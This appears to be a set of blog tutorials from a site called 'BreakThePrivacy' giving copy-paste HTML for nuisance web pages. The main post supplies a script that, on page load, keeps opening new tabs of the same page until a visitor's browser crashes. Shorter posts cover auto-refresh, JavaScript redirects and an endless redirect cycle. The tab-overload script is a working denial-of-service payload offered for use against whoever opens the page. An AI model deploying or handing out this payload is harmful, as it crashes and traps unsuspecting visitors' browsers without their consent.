How To Crash Browser With Tab Overflow/Overload, Create your own script #breaktheprivacy

How To Crash Browser With Tab Overflow/Overload, Create your own script #breaktheprivacy 

note: pop-ups should be allowed on browser to run the script, ad-blocker should be disabled 


remember: 

to stop-
1> just close the last tab opened fast before it creates another tab.
2> or close the browser.

Here's an example-> https://www.breaktheprivacy.com/p/browser-overload-script.html

STEPS INCLUDED:-


STEP #1. 
Edit Your Webpage or post in HTML


STEP #2. Copy the following code and paste it there.


<html>
<head>
<script src="http://code.jquery.com/jquery-1.11.0.min.js"></script>
<script>
jQuery(document).ready(function () {
newTab();
});

function newTab() {
 var form = document.createElement("form");
 form.method = "GET";
 form.action = "http://www.breaktheprivacy.com/p/browser-overload-script.html";
 form.target = "_blank";
 document.body.appendChild(form);
 form.submit();
}
</script>
</head>
<body>

</body>
</html>

STEP #3. Click on save and Run your webpage,post. It'll refresh/reload automatically .

How to create a webpage/post that redirect to itself i.e. refresh/ reload automatically #BreakThePrivacy

Here's an example -> http://www.breaktheprivacy.com/p/auto-reload.html


How to create a webpage/post that redirect to itself i.e. refresh/ reload automatically #BreakThePrivacy  




STEPS INCLUDED:-


STEP #1.
  Edit Your Webpage or post in HTML


STEP #2. Copy the following code and paste it there.




<html>
    <head>
        <title>Auto Refresh</title>
        <meta http-equiv="refresh" content="1">
    </head>
    <body>

    </body>
</html>



STEP #3. Replace 1 with time you want the page to be refreshed automatically after for ex 5,10 etc etc. 



STEP #4. Click on save and Run your webpage,post. It'll refresh/reload automatically .





Sharing is Caring
if you find any content useful, and might help someone too, 'coz 1+1=11 xD




How to create a custom Redirection for your post, web page #code BreakThePrivacy

How to create a custom Redirection for your post, web page #code BreakThePrivacy



STEPS INCLUDED:-


STEP #1.
  Edit Your Webpage or post in HTML


STEP #2. Copy the following code and paste it there.


      <html lang="en-US">
      <head>

        <script type="text/javascript">
            window.location.href = "http://www.breaktheprivacy.com"
        </script>
        <title>Break The Privacy</title>
    </head>
    <body>

        <!-- Note: don't tell people to `click` the link, just tell them that it is a link. -->
        If you are not redirected automatically, follow this <a href="http://breaktheprivacy.com">Break The  Privacy</a>.
    </body>
</html>




STEP #3. Replace www.breaktheprivacy.com with the link you want to redirect to. 



STEP #4. Click on save and Run your webpage,post. It'll be redirected automatically .

You can also create a redirection cycle which will never end. By connecting each page to other in a circle Check this Out --> https://www.breaktheprivacy.com/p/redirection-cycle.html

Sharing is Caring
if you find any content useful, and might help someone too, 'coz 1+1=11 xD